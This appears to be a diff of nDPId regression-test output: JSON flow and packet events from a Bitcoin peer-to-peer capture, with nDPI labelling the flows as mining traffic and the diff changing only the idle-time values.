+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":215,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":215,"packets-processed":214,"total-skipped-flows":0,"total-l4-data-len":260266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1301328538215} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":495,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":495,"packets-processed":494,"total-skipped-flows":0,"total-l4-data-len":520135,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":5,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1301329138452} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"} -00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"} +00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":622,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":622,"packets-processed":621,"total-skipped-flows":0,"total-l4-data-len":537564,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1301329743430} 
-00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 